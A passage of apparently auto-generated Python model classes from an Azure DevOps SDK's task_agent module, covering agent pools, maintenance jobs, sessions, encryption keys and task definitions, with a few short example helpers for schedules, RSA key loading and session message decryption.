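        queue_wait = request.assign_time - request.queue_time
    if request.receive_time and request.finish_time:
        run_time = request.finish_time - request.receive_time
    return queue_wait, run_time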
class TaskAgentMessage(Model):
"""
Provides a contract for receiving messages from the task orchestrator.
:param body: Gets or sets the body of the message. If the <c>IV</c> property is provided the body will need to be decrypted using the <c>TaskAgentSession.EncryptionKey</c> value in addition to the <c>IV</c>.
:type body: str
:param iv: Gets or sets the initialization vector used to encrypt this message.
:type iv: str
:param message_id: Gets or sets the message identifier.
:type message_id: long
:param message_type: Gets or sets the message type, describing the data contract found in <c>TaskAgentMessage.Body</c>.
:type message_type: str
"""
_attribute_map = {
'body': {'key': 'body', 'type': 'str'},
'iv': {'key': 'iv', 'type': 'str'},
'message_id': {'key': 'messageId', 'type': 'long'},
'message_type': {'key': 'messageType', 'type': 'str'}
}
def __init__(self, body=None, iv=None, message_id=None, message_type=None):
super(TaskAgentMessage, self).__init__()
self.body = body
self.iv = iv
self.message_id = message_id
self.message_type = message_type
class TaskAgentPoolMaintenanceDefinition(Model):
"""
:param enabled: Enable maintenance
:type enabled: bool
:param id: Id
:type id: int
:param job_timeout_in_minutes: Maintenance job timeout per agent
:type job_timeout_in_minutes: int
    :param max_concurrent_agents_percentage: Maximum percentage of agents within a pool that may run a maintenance job at a given time
:type max_concurrent_agents_percentage: int
:param options:
:type options: :class:`TaskAgentPoolMaintenanceOptions <azure.devops.v5_1.task_agent.models.TaskAgentPoolMaintenanceOptions>`
:param pool: Pool reference for the maintenance definition
:type pool: :class:`TaskAgentPoolReference <azure.devops.v5_1.task_agent.models.TaskAgentPoolReference>`
:param retention_policy:
:type retention_policy: :class:`TaskAgentPoolMaintenanceRetentionPolicy <azure.devops.v5_1.task_agent.models.TaskAgentPoolMaintenanceRetentionPolicy>`
:param schedule_setting:
:type schedule_setting: :class:`TaskAgentPoolMaintenanceSchedule <azure.devops.v5_1.task_agent.models.TaskAgentPoolMaintenanceSchedule>`
"""
_attribute_map = {
'enabled': {'key': 'enabled', 'type': 'bool'},
'id': {'key': 'id', 'type': 'int'},
'job_timeout_in_minutes': {'key': 'jobTimeoutInMinutes', 'type': 'int'},
'max_concurrent_agents_percentage': {'key': 'maxConcurrentAgentsPercentage', 'type': 'int'},
'options': {'key': 'options', 'type': 'TaskAgentPoolMaintenanceOptions'},
'pool': {'key': 'pool', 'type': 'TaskAgentPoolReference'},
'retention_policy': {'key': 'retentionPolicy', 'type': 'TaskAgentPoolMaintenanceRetentionPolicy'},
'schedule_setting': {'key': 'scheduleSetting', 'type': 'TaskAgentPoolMaintenanceSchedule'}
}
def __init__(self, enabled=None, id=None, job_timeout_in_minutes=None, max_concurrent_agents_percentage=None, options=None, pool=None, retention_policy=None, schedule_setting=None):
super(TaskAgentPoolMaintenanceDefinition, self).__init__()
self.enabled = enabled
self.id = id
self.job_timeout_in_minutes = job_timeout_in_minutes
self.max_concurrent_agents_percentage = max_concurrent_agents_percentage
self.options = options
self.pool = pool
self.retention_policy = retention_policy
self.schedule_setting = schedule_setting
class TaskAgentPoolMaintenanceJob(Model):
"""
:param definition_id: The maintenance definition for the maintenance job
:type definition_id: int
:param error_count: The total error counts during the maintenance job
:type error_count: int
:param finish_time: Time that the maintenance job was completed
:type finish_time: datetime
:param job_id: Id of the maintenance job
:type job_id: int
:param logs_download_url: The log download url for the maintenance job
:type logs_download_url: str
:param orchestration_id: Orchestration/Plan Id for the maintenance job
:type orchestration_id: str
:param pool: Pool reference for the maintenance job
:type pool: :class:`TaskAgentPoolReference <azure.devops.v5_1.task_agent.models.TaskAgentPoolReference>`
:param queue_time: Time that the maintenance job was queued
:type queue_time: datetime
:param requested_by: The identity that queued the maintenance job
:type requested_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param result: The maintenance job result
:type result: object
:param start_time: Time that the maintenance job was started
:type start_time: datetime
:param status: Status of the maintenance job
:type status: object
:param target_agents:
:type target_agents: list of :class:`TaskAgentPoolMaintenanceJobTargetAgent <azure.devops.v5_1.task_agent.models.TaskAgentPoolMaintenanceJobTargetAgent>`
:param warning_count: The total warning counts during the maintenance job
:type warning_count: int
"""
_attribute_map = {
'definition_id': {'key': 'definitionId', 'type': 'int'},
'error_count': {'key': 'errorCount', 'type': 'int'},
'finish_time': {'key': 'finishTime', 'type': 'iso-8601'},
'job_id': {'key': 'jobId', 'type': 'int'},
'logs_download_url': {'key': 'logsDownloadUrl', 'type': 'str'},
'orchestration_id': {'key': 'orchestrationId', 'type': 'str'},
'pool': {'key': 'pool', 'type': 'TaskAgentPoolReference'},
'queue_time': {'key': 'queueTime', 'type': 'iso-8601'},
'requested_by': {'key': 'requestedBy', 'type': 'IdentityRef'},
'result': {'key': 'result', 'type': 'object'},
'start_time': {'key': 'startTime', 'type': 'iso-8601'},
'status': {'key': 'status', 'type': 'object'},
'target_agents': {'key': 'targetAgents', 'type': '[TaskAgentPoolMaintenanceJobTargetAgent]'},
'warning_count': {'key': 'warningCount', 'type': 'int'}
}
def __init__(self, definition_id=None, error_count=None, finish_time=None, job_id=None, logs_download_url=None, orchestration_id=None, pool=None, queue_time=None, requested_by=None, result=None, start_time=None, status=None, target_agents=None, warning_count=None):
super(TaskAgentPoolMaintenanceJob, self).__init__()
self.definition_id = definition_id
self.error_count = error_count
self.finish_time = finish_time
self.job_id = job_id
self.logs_download_url = logs_download_url
self.orchestration_id = orchestration_id
self.pool = pool
self.queue_time = queue_time
self.requested_by = requested_by
self.result = result
self.start_time = start_time
self.status = status
self.target_agents = target_agents
self.warning_count = warning_count
class TaskAgentPoolMaintenanceJobTargetAgent(Model):
"""
:param agent:
:type agent: :class:`TaskAgentReference <azure.devops.v5_1.task_agent.models.TaskAgentReference>`
:param job_id:
:type job_id: int
:param result:
:type result: object
:param status:
:type status: object
"""
_attribute_map = {
'agent': {'key': 'agent', 'type': 'TaskAgentReference'},
'job_id': {'key': 'jobId', 'type': 'int'},
'result': {'key': 'result', 'type': 'object'},
'status': {'key': 'status', 'type': 'object'}
}
def __init__(self, agent=None, job_id=None, result=None, status=None):
super(TaskAgentPoolMaintenanceJobTargetAgent, self).__init__()
self.agent = agent
self.job_id = job_id
self.result = result
self.status = status
class TaskAgentPoolMaintenanceOptions(Model):
"""
    :param working_directory_expiration_in_days: Time, in days, after which a System.DefaultWorkingDirectory is considered stale
:type working_directory_expiration_in_days: int
"""
_attribute_map = {
'working_directory_expiration_in_days': {'key': 'workingDirectoryExpirationInDays', 'type': 'int'}
}
def __init__(self, working_directory_expiration_in_days=None):
super(TaskAgentPoolMaintenanceOptions, self).__init__()
self.working_directory_expiration_in_days = working_directory_expiration_in_days
class TaskAgentPoolMaintenanceRetentionPolicy(Model):
"""
    :param number_of_history_records_to_keep: Number of history records to keep for maintenance jobs executed with this definition.
:type number_of_history_records_to_keep: int
"""
_attribute_map = {
'number_of_history_records_to_keep': {'key': 'numberOfHistoryRecordsToKeep', 'type': 'int'}
}
def __init__(self, number_of_history_records_to_keep=None):
super(TaskAgentPoolMaintenanceRetentionPolicy, self).__init__()
self.number_of_history_records_to_keep = number_of_history_records_to_keep
class TaskAgentPoolMaintenanceSchedule(Model):
"""
:param days_to_build: Days for a build (flags enum for days of the week)
:type days_to_build: object
:param schedule_job_id: The Job Id of the Scheduled job that will queue the pool maintenance job.
:type schedule_job_id: str
:param start_hours: Local timezone hour to start
:type start_hours: int
:param start_minutes: Local timezone minute to start
:type start_minutes: int
:param time_zone_id: Time zone of the build schedule (string representation of the time zone id)
:type time_zone_id: str
"""
_attribute_map = {
'days_to_build': {'key': 'daysToBuild', 'type': 'object'},
'schedule_job_id': {'key': 'scheduleJobId', 'type': 'str'},
'start_hours': {'key': 'startHours', 'type': 'int'},
'start_minutes': {'key': 'startMinutes', 'type': 'int'},
'time_zone_id': {'key': 'timeZoneId', 'type': 'str'}
}
def __init__(self, days_to_build=None, schedule_job_id=None, start_hours=None, start_minutes=None, time_zone_id=None):
super(TaskAgentPoolMaintenanceSchedule, self).__init__()
self.days_to_build = days_to_build
self.schedule_job_id = schedule_job_id
self.start_hours = start_hours
self.start_minutes = start_minutes
self.time_zone_id = time_zone_id
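# A minimal sketch of a weekly maintenance window built from the fields
# documented above. 'days_to_build' is a flags enum serialized as an
# object, so the plain string used here is an assumption about the wire
# format rather than a documented contract.
def _example_maintenance_schedule():
    return TaskAgentPoolMaintenanceSchedule(
        days_to_build='saturday',
        start_hours=2,
        start_minutes=30,
        time_zone_id='UTC'
    )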
class TaskAgentPoolReference(Model):
"""
:param id:
:type id: int
:param is_hosted: Gets or sets a value indicating whether or not this pool is managed by the service.
:type is_hosted: bool
:param is_legacy: Determines whether the pool is legacy.
:type is_legacy: bool
:param name:
:type name: str
:param pool_type: Gets or sets the type of the pool
:type pool_type: object
:param scope:
:type scope: str
:param size: Gets the current size of the pool.
:type size: int
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'int'},
'is_hosted': {'key': 'isHosted', 'type': 'bool'},
'is_legacy': {'key': 'isLegacy', 'type': 'bool'},
'name': {'key': 'name', 'type': 'str'},
'pool_type': {'key': 'poolType', 'type': 'object'},
'scope': {'key': 'scope', 'type': 'str'},
'size': {'key': 'size', 'type': 'int'}
}
def __init__(self, id=None, is_hosted=None, is_legacy=None, name=None, pool_type=None, scope=None, size=None):
super(TaskAgentPoolReference, self).__init__()
self.id = id
self.is_hosted = is_hosted
self.is_legacy = is_legacy
self.name = name
self.pool_type = pool_type
self.scope = scope
self.size = size
class TaskAgentPublicKey(Model):
"""
Represents the public key portion of an RSA asymmetric key.
:param exponent: Gets or sets the exponent for the public key.
:type exponent: str
:param modulus: Gets or sets the modulus for the public key.
:type modulus: str
"""
_attribute_map = {
'exponent': {'key': 'exponent', 'type': 'str'},
'modulus': {'key': 'modulus', 'type': 'str'}
}
def __init__(self, exponent=None, modulus=None):
super(TaskAgentPublicKey, self).__init__()
self.exponent = exponent
self.modulus = modulus
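# A hedged sketch of turning TaskAgentPublicKey into a usable RSA key with
# the 'cryptography' package. The exponent/modulus fields are strings; the
# base64, big-endian encoding assumed below is a guess about the wire
# format, not something these models guarantee.
def _example_load_public_key(public_key):
    import base64
    from cryptography.hazmat.primitives.asymmetric.rsa import RSAPublicNumbers
    exponent = int.from_bytes(base64.b64decode(public_key.exponent), 'big')
    modulus = int.from_bytes(base64.b64decode(public_key.modulus), 'big')
    return RSAPublicNumbers(exponent, modulus).public_key()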
class TaskAgentQueue(Model):
"""
An agent queue.
:param id: ID of the queue
:type id: int
:param name: Name of the queue
:type name: str
:param pool: Pool reference for this queue
:type pool: :class:`TaskAgentPoolReference <azure.devops.v5_1.task_agent.models.TaskAgentPoolReference>`
:param project_id: Project ID
:type project_id: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'int'},
'name': {'key': 'name', 'type': 'str'},
'pool': {'key': 'pool', 'type': 'TaskAgentPoolReference'},
'project_id': {'key': 'projectId', 'type': 'str'}
}
def __init__(self, id=None, name=None, pool=None, project_id=None):
super(TaskAgentQueue, self).__init__()
self.id = id
self.name = name
self.pool = pool
self.project_id = project_id
class TaskAgentReference(Model):
"""
A reference to an agent.
:param _links:
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.task_agent.models.ReferenceLinks>`
:param access_point: This agent's access point.
:type access_point: str
:param enabled: Whether or not this agent should run jobs.
:type enabled: bool
:param id: Identifier of the agent.
:type id: int
:param name: Name of the agent.
:type name: str
:param os_description: Agent OS.
:type os_description: str
:param provisioning_state: Provisioning state of this agent.
:type provisioning_state: str
:param status: Whether or not the agent is online.
:type status: object
:param version: Agent version.
:type version: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'access_point': {'key': 'accessPoint', 'type': 'str'},
'enabled': {'key': 'enabled', 'type': 'bool'},
'id': {'key': 'id', 'type': 'int'},
'name': {'key': 'name', 'type': 'str'},
'os_description': {'key': 'osDescription', 'type': 'str'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'status': {'key': 'status', 'type': 'object'},
'version': {'key': 'version', 'type': 'str'}
}
def __init__(self, _links=None, access_point=None, enabled=None, id=None, name=None, os_description=None, provisioning_state=None, status=None, version=None):
super(TaskAgentReference, self).__init__()
self._links = _links
self.access_point = access_point
self.enabled = enabled
self.id = id
self.name = name
self.os_description = os_description
self.provisioning_state = provisioning_state
self.status = status
self.version = version
class TaskAgentSession(Model):
"""
Represents a session for performing message exchanges from an agent.
:param agent: Gets or sets the agent which is the target of the session.
:type agent: :class:`TaskAgentReference <azure.devops.v5_1.task_agent.models.TaskAgentReference>`
:param encryption_key: Gets the key used to encrypt message traffic for this session.
:type encryption_key: :class:`TaskAgentSessionKey <azure.devops.v5_1.task_agent.models.TaskAgentSessionKey>`
:param owner_name: Gets or sets the owner name of this session. Generally this will be the machine of origination.
:type owner_name: str
:param session_id: Gets the unique identifier for this session.
:type session_id: str
:param system_capabilities:
:type system_capabilities: dict
"""
_attribute_map = {
'agent': {'key': 'agent', 'type': 'TaskAgentReference'},
'encryption_key': {'key': 'encryptionKey', 'type': 'TaskAgentSessionKey'},
'owner_name': {'key': 'ownerName', 'type': 'str'},
'session_id': {'key': 'sessionId', 'type': 'str'},
'system_capabilities': {'key': 'systemCapabilities', 'type': '{str}'}
}
def __init__(self, agent=None, encryption_key=None, owner_name=None, session_id=None, system_capabilities=None):
super(TaskAgentSession, self).__init__()
self.agent = agent
self.encryption_key = encryption_key
self.owner_name = owner_name
self.session_id = session_id
self.system_capabilities = system_capabilities
class TaskAgentSessionKey(Model):
"""
Represents a symmetric key used for message-level encryption for communication sent to an agent.
:param encrypted: Gets or sets a value indicating whether or not the key value is encrypted. If this value is true, the Value property should be decrypted using the <c>RSA</c> key exchanged with the server during registration.
:type encrypted: bool
:param value: Gets or sets the symmetric key value.
:type value: str
"""
_attribute_map = {
'encrypted': {'key': 'encrypted', 'type': 'bool'},
'value': {'key': 'value', 'type': 'str'}
}
def __init__(self, encrypted=None, value=None):
super(TaskAgentSessionKey, self).__init__()
self.encrypted = encrypted
self.value = value
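# A heavily hedged sketch of the decryption flow described on
# TaskAgentMessage and TaskAgentSessionKey: when a message carries an 'iv',
# its base64 body is decrypted with the symmetric session key. AES-CBC with
# PKCS7 padding is an assumption here, not a contract these models state.
def _example_decrypt_message(message, session_key_bytes):
    import base64
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    decryptor = Cipher(
        algorithms.AES(session_key_bytes),
        modes.CBC(base64.b64decode(message.iv))
    ).decryptor()
    padded = decryptor.update(base64.b64decode(message.body)) + decryptor.finalize()
    unpadder = padding.PKCS7(algorithms.AES.block_size).unpadder()
    return (unpadder.update(padded) + unpadder.finalize()).decode('utf-8')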
class TaskAgentUpdate(Model):
"""
Details about an agent update.
:param current_state: Current state of this agent update.
:type current_state: str
:param reason: Reason for this update.
:type reason: :class:`TaskAgentUpdateReason <azure.devops.v5_1.task_agent.models.TaskAgentUpdateReason>`
:param requested_by: Identity which requested this update.
:type requested_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param request_time: Date on which this update was requested.
:type request_time: datetime
:param source_version: Source agent version of the update.
:type source_version: :class:`PackageVersion <azure.devops.v5_1.task_agent.models.PackageVersion>`
:param target_version: Target agent version of the update.
:type target_version: :class:`PackageVersion <azure.devops.v5_1.task_agent.models.PackageVersion>`
"""
_attribute_map = {
'current_state': {'key': 'currentState', 'type': 'str'},
'reason': {'key': 'reason', 'type': 'TaskAgentUpdateReason'},
'requested_by': {'key': 'requestedBy', 'type': 'IdentityRef'},
'request_time': {'key': 'requestTime', 'type': 'iso-8601'},
'source_version': {'key': 'sourceVersion', 'type': 'PackageVersion'},
'target_version': {'key': 'targetVersion', 'type': 'PackageVersion'}
}
def __init__(self, current_state=None, reason=None, requested_by=None, request_time=None, source_version=None, target_version=None):
super(TaskAgentUpdate, self).__init__()
self.current_state = current_state
self.reason = reason
self.requested_by = requested_by
self.request_time = request_time
self.source_version = source_version
self.target_version = target_version
class TaskAgentUpdateReason(Model):
"""
:param code:
:type code: object
"""
_attribute_map = {
'code': {'key': 'code', 'type': 'object'}
}
def __init__(self, code=None):
super(TaskAgentUpdateReason, self).__init__()
self.code = code
class TaskDefinition(Model):
"""
:param agent_execution:
:type agent_execution: :class:`TaskExecution <azure.devops.v5_1.task_agent.models.TaskExecution>`
:param author:
:type author: str
:param category:
:type category: str
:param contents_uploaded:
:type contents_uploaded: bool
:param contribution_identifier:
:type contribution_identifier: str
:param contribution_version:
:type contribution_version: str
:param data_source_bindings:
:type data_source_bindings: list of :class:`DataSourceBinding <azure.devops.v5_1.task_agent.models.DataSourceBinding>`
:param definition_type:
:type definition_type: str
:param demands:
:type demands: list of :class:`object <azure.devops.v5_1.task_agent.models.object>`
:param deprecated:
:type deprecated: bool
:param description:
:type description: str
:param disabled:
:type disabled: bool
:param ecosystem:
:type ecosystem: str
:param execution:
:type execution: dict
:param friendly_name:
:type friendly_name: str
:param groups:
:type groups: list of :class:`TaskGroupDefinition <azure.devops.v5_1.task_agent.models.TaskGroupDefinition>`
:param help_mark_down:
:type help_mark_down: str
:param help_url:
:type help_url: str
:param host_type:
:type host_type: str
:param icon_url:
:type icon_url: str
:param id:
:type id: str
:param inputs:
:type inputs: list of :class:`TaskInputDefinition <azure.devops.v5_1.task_agent.models.TaskInputDefinition>`
:param instance_name_format:
:type instance_name_format: str
:param minimum_agent_version:
:type minimum_agent_version: str
:param name:
:type name: str
:param output_variables:
:type output_variables: list of :class:`TaskOutputVariable <azure.devops.v5_1.task_agent.models.TaskOutputVariable>`
:param package_location:
:type package_location: str
:param package_type:
:type package_type: str
:param post_job_execution:
:type post_job_execution: dict
:param pre_job_execution:
:type pre_job_execution: dict
:param preview:
:type preview: bool
:param release_notes:
:type release_notes: str
:param runs_on:
:type runs_on: list of str
:param satisfies:
:type satisfies: list of str
:param server_owned:
:type server_owned: bool
:param show_environment_variables:
:type show_environment_variables: bool
:param source_definitions:
:type source_definitions: list of :class:`TaskSourceDefinition <azure.devops.v5_1.task_agent.models.TaskSourceDefinition>`
:param source_location:
:type source_location: str
:param version:
:type version: :class:`TaskVersion <azure.devops.v5_1.task_agent.models.TaskVersion>`
:param visibility:
:type visibility: list of str
"""
_attribute_map = {
'agent_execution': {'key': 'agentExecution', 'type': 'TaskExecution'},
'author': {'key': 'author', 'type': 'str'},
'category': {'key': 'category', 'type': 'str'},
'contents_uploaded': {'key': 'contentsUploaded', 'type': 'bool'},
'contribution_identifier': {'key': 'contributionIdentifier', 'type': 'str'},
'contribution_version': {'key': 'contributionVersion', 'type': 'str'},
'data_source_bindings': {'key': 'dataSourceBindings', 'type': '[DataSourceBinding]'},
'definition_type': {'key': 'definitionType', 'type': 'str'},
'demands': {'key': 'demands', 'type': '[object]'},
'deprecated': {'key': 'deprecated', 'type': 'bool'},
'description': {'key': 'description', 'type': 'str'},
'disabled': {'key': 'disabled', 'type': 'bool'},
'ecosystem': {'key': 'ecosystem', 'type': 'str'},
'execution': {'key': 'execution', 'type': '{object}'},
'friendly_name': {'key': 'friendlyName', 'type': 'str'},
'groups': {'key': 'groups', 'type': '[TaskGroupDefinition]'},
'help_mark_down': {'key': 'helpMarkDown', 'type': 'str'},
'help_url': {'key': 'helpUrl', 'type': 'str'},
'host_type': {'key': 'hostType', 'type': 'str'},
'icon_url': {'key': 'iconUrl', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[TaskInputDefinition]'},
'instance_name_format': {'key': 'instanceNameFormat', 'type': 'str'},
'minimum_agent_version': {'key': 'minimumAgentVersion', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'output_variables': {'key': 'outputVariables', 'type': '[TaskOutputVariable]'},
'package_location': {'key': 'packageLocation', 'type': 'str'},
'package_type': {'key': 'packageType', 'type': 'str'},
'post_job_execution': {'key': 'postJobExecution', 'type': '{object}'},
'pre_job_execution': {'key': 'preJobExecution', 'type': '{object}'},
'preview': {'key': 'preview', 'type': 'bool'},
'release_notes': {'key': 'releaseNotes', 'type': 'str'},
'runs_on': {'key': 'runsOn', 'type': '[str]'},
'satisfies': {'key': 'satisfies', 'type': '[str]'},
'server_owned': {'key': 'serverOwned', 'type': 'bool'},
'show_environment_variables': {'key': 'showEnvironmentVariables', 'type': 'bool'},
'source_definitions': {'key': 'sourceDefinitions', 'type': '[TaskSourceDefinition]'},
'source_location': {'key': 'sourceLocation', 'type': 'str'},
'version': {'key': 'version', 'type': 'TaskVersion'},
'visibility': {'key': 'visibility', 'type': '[str]'}
}
def __init__(self, agent_execution=None, author=None, category=None, contents_uploaded=None, contribution_identifier=None, contribution_version=None, data_source_bindings=None, definition_type=None, demands=None, deprecated=None, description=None, disabled=None, ecosystem=None, execution=None, friendly_name=None, groups=None, help_mark_down=None, help_url=None, host_type=None, icon_url=None, id=None, inputs=None, instance_name_format=None, minimum_agent_version=None, name=None, output_variables=None, package_location=None, package_type=None, post_job_execution=None, pre_job_execution=None, preview=None, release_notes=None, runs_on=None, satisfies=None, server_owned=None, show_environment_variables=None, source_definitions=None, source_location=None, version=None, visibility=None):
super(TaskDefinition, self).__init__()
self.agent_execution = agent_execution
self.author = author
self.category = category
self.contents_uploaded = contents_uploaded
self.contribution_identifier = contribution_identifier
self.contribution_version = contribution_version
self.data_source_bindings = data_source_bindings
self.definition_type = definition_type
self.demands = demands
self.deprecated = deprecated
self.description = description
self.disabled = disabled
self.ecosystem = ecosystem
self.execution = execution
self.friendly_name = friendly_name
self.groups = groups
self.help_mark_down = help_mark_down
self.help_url = help_url
self.host_type = host_type
self.icon_url = icon_url
self.id = id
self.inputs = inputs
self.instance_name_format = instance_name_format
self.minimum_agent_version = minimum_agent_version
self.name = name
self.output_variables = output_variables
self.package_location = package_location
self.package_type = package_type
self.post_job_execution = post_job_execution
self.pre_job_execution = pre_job_execution
self.preview = preview
self.release_notes = release_notes
self.runs_on = runs_on
self.satisfies = satisfies
self.server_owned = server_owned
self.show_environment_variables = show_environment_variables
self.source_definitions = source_definitions
self.source_location = source_location
self.version = version
self.visibility = visibility
class TaskDefinitionEndpoint(Model):
"""
:param connection_id: An ID that identifies a service connection to be used for authenticating endpoint requests.
:type connection_id: str
    :param key_selector: A JSON-based key selector used to filter the response returned by fetching the endpoint <c>Url</c>. A JSON-based key selector must be prefixed with "jsonpath:". KeySelector can be used to specify the filter that selects the keys for the values specified with Selector. <example> The following key selector defines a JSON path for extracting nodes named 'ServiceName'. <code> endpoint.KeySelector = "jsonpath://ServiceName"; </code></example>
:type key_selector: str
:param scope: The scope as understood by Connected Services. Essentially, a project-id for now.
:type scope: str
    :param selector: An XPath- or JSON-based selector used to filter the response returned by fetching the endpoint <c>Url</c>. An XPath-based selector must be prefixed with the string "xpath:"; a JSON-based selector must be prefixed with "jsonpath:". <example> The following selector defines an XPath for extracting nodes named 'ServiceName'. <code> endpoint.Selector = "xpath://ServiceName"; </code></example>
:type selector: str
:param task_id: TaskId that this endpoint belongs to.
:type task_id: str
:param url: URL to GET.
:type url: str
"""
_attribute_map = {
'connection_id': {'key': 'connectionId', 'type': 'str'},
'key_selector': {'key': 'keySelector', 'type': 'str'},
'scope': {'key': 'scope', 'type': 'str'},
'selector': {'key': 'selector', 'type': 'str'},
'task_id': {'key': 'taskId', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'}
}
def __init__(self, connection_id=None, key_selector=None, scope=None, selector=None, task_id=None, url=None):
super(TaskDefinitionEndpoint, self).__init__()
self.connection_id = connection_id
self.key_selector = key_selector
self.scope = scope
self.selector = selector
self.task_id = task_id
self.url = url
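# An illustrative sketch reusing the selector convention from the docstring
# above. The connection id, task id and URL are hypothetical placeholders.
def _example_definition_endpoint():
    return TaskDefinitionEndpoint(
        connection_id='00000000-0000-0000-0000-000000000000',
        scope='my-project-id',
        selector='xpath://ServiceName',
        key_selector='jsonpath://ServiceName',
        task_id='my-task-guid',
        url='https://example.com/services'
    )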
class TaskDefinitionReference(Model):
"""
:param definition_type: Gets or sets the definition type. Values can be 'task' or 'metaTask'.
:type definition_type: str
:param id: Gets or sets the unique identifier of task.
:type id: str
:param version_spec: Gets or sets the version specification of task.
:type version_spec: str
"""
_attribute_map = {
'definition_type': {'key': 'definitionType', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'version_spec': {'key': 'versionSpec', 'type': 'str'}
}
def __init__(self, definition_type=None, id=None, version_spec=None):
super(TaskDefinitionReference, self).__init__()
self.definition_type = definition_type
self.id = id
self.version_spec = version_spec
class TaskExecution(Model):
"""
    :param exec_task: The utility task to run. Specifying this means that this task definition is simply a meta task that calls another task. This is useful for tasks that call utility tasks like the PowerShell and command-line tasks.
:type exec_task: :class:`TaskReference <azure.devops.v5_1.task_agent.models.TaskReference>`
    :param platform_instructions: If a task is going to run code, then this provides the type/script/etc. information by platform. For example, it might look like: net45: { typeName: "Microsoft.TeamFoundation.Automation.Tasks.PowerShellTask", assemblyName: "Microsoft.TeamFoundation.Automation.Tasks.PowerShell.dll" } net20: { typeName: "Microsoft.TeamFoundation.Automation.Tasks.PowerShellTask", assemblyName: "Microsoft.TeamFoundation.Automation.Tasks.PowerShell.dll" } java: { jar: "powershelltask.tasks.automation.teamfoundation.microsoft.com" } node: { script: "powershellhost.js" }
:type platform_instructions: dict
"""
_attribute_map = {
'exec_task': {'key': 'execTask', 'type': 'TaskReference'},
'platform_instructions': {'key': 'platformInstructions', 'type': '{{str}}'}
}
def __init__(self, exec_task=None, platform_instructions=None):
super(TaskExecution, self).__init__()
self.exec_task = exec_task
self.platform_instructions = platform_instructions
class TaskGroup(TaskDefinition):
"""
:param agent_execution:
:type agent_execution: :class:`TaskExecution <azure.devops.v5_1.task_agent.models.TaskExecution>`
:param author:
:type author: str
:param category:
:type category: str
:param contents_uploaded:
:type contents_uploaded: bool
:param contribution_identifier:
:type contribution_identifier: str
:param contribution_version:
:type contribution_version: str
:param data_source_bindings:
:type data_source_bindings: list of :class:`DataSourceBinding <azure.devops.v5_1.task_agent.models.DataSourceBinding>`
:param definition_type:
:type definition_type: str
:param demands:
:type demands: list of :class:`object <azure.devops.v5_1.task_agent.models.object>`
:param deprecated:
:type deprecated: bool
:param description:
:type description: str
:param disabled:
:type disabled: bool
:param ecosystem:
:type ecosystem: str
:param execution:
:type execution: dict
:param friendly_name:
:type friendly_name: str
:param groups:
:type groups: list of :class:`TaskGroupDefinition <azure.devops.v5_1.task_agent.models.TaskGroupDefinition>`
:param help_mark_down:
:type help_mark_down: str
:param help_url:
:type help_url: str
:param host_type:
:type host_type: str
:param icon_url:
:type icon_url: str
:param id:
:type id: str
:param inputs:
:type inputs: list of :class:`TaskInputDefinition <azure.devops.v5_1.task_agent.models.TaskInputDefinition>`
:param instance_name_format:
:type instance_name_format: str
:param minimum_agent_version:
:type minimum_agent_version: str
:param name:
:type name: str
:param output_variables:
:type output_variables: list of :class:`TaskOutputVariable <azure.devops.v5_1.task_agent.models.TaskOutputVariable>`
:param package_location:
:type package_location: str
:param package_type:
:type package_type: str
:param post_job_execution:
:type post_job_execution: dict
:param pre_job_execution:
:type pre_job_execution: dict
:param preview:
:type preview: bool
:param release_notes:
:type release_notes: str
:param runs_on:
:type runs_on: list of str
:param satisfies:
:type satisfies: list of str
:param server_owned:
:type server_owned: bool
:param show_environment_variables:
:type show_environment_variables: bool
:param source_definitions:
:type source_definitions: list of :class:`TaskSourceDefinition <azure.devops.v5_1.task_agent.models.TaskSourceDefinition>`
:param source_location:
:type source_location: str
:param version:
:type version: :class:`TaskVersion <azure.devops.v5_1.task_agent.models.TaskVersion>`
:param visibility:
:type visibility: list of str
    :param comment: Gets or sets the comment.
    :type comment: str
    :param created_by: Gets or sets the identity who created the task group.
    :type created_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
    :param created_on: Gets or sets the date on which the task group was created.
    :type created_on: datetime
    :param deleted: Gets or sets 'true' to indicate the task group is deleted, 'false' otherwise.
    :type deleted: bool
    :param modified_by: Gets or sets the identity who last modified the task group.
    :type modified_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
    :param modified_on: Gets or sets the date on which the task group was last modified.
    :type modified_on: datetime
:param owner: Gets or sets the owner.
:type owner: str
:param parent_definition_id: Gets or sets parent task group Id. This is used while creating a draft task group.
:type parent_definition_id: str
:param revision: Gets or sets revision.
:type revision: int
:param tasks: Gets or sets the tasks.
:type tasks: list of :class:`TaskGroupStep <azure.devops.v5_1.task_agent.models.TaskGroupStep>`
"""
_attribute_map = {
'agent_execution': {'key': 'agentExecution', 'type': 'TaskExecution'},
'author': {'key': 'author', 'type': 'str'},
'category': {'key': 'category', 'type': 'str'},
'contents_uploaded': {'key': 'contentsUploaded', 'type': 'bool'},
'contribution_identifier': {'key': 'contributionIdentifier', 'type': 'str'},
'contribution_version': {'key': 'contributionVersion', 'type': 'str'},
'data_source_bindings': {'key': 'dataSourceBindings', 'type': '[DataSourceBinding]'},
'definition_type': {'key': 'definitionType', 'type': 'str'},
'demands': {'key': 'demands', 'type': '[object]'},
'deprecated': {'key': 'deprecated', 'type': 'bool'},
'description': {'key': 'description', 'type': 'str'},
'disabled': {'key': 'disabled', 'type': 'bool'},
'ecosystem': {'key': 'ecosystem', 'type': 'str'},
'execution': {'key': 'execution', 'type': '{object}'},
'friendly_name': {'key': 'friendlyName', 'type': 'str'},
'groups': {'key': 'groups', 'type': '[TaskGroupDefinition]'},
'help_mark_down': {'key': 'helpMarkDown', 'type': 'str'},
'help_url': {'key': 'helpUrl', 'type': 'str'},
'host_type': {'key': 'hostType', 'type': 'str'},
'icon_url': {'key': 'iconUrl', 'type': 'str'},
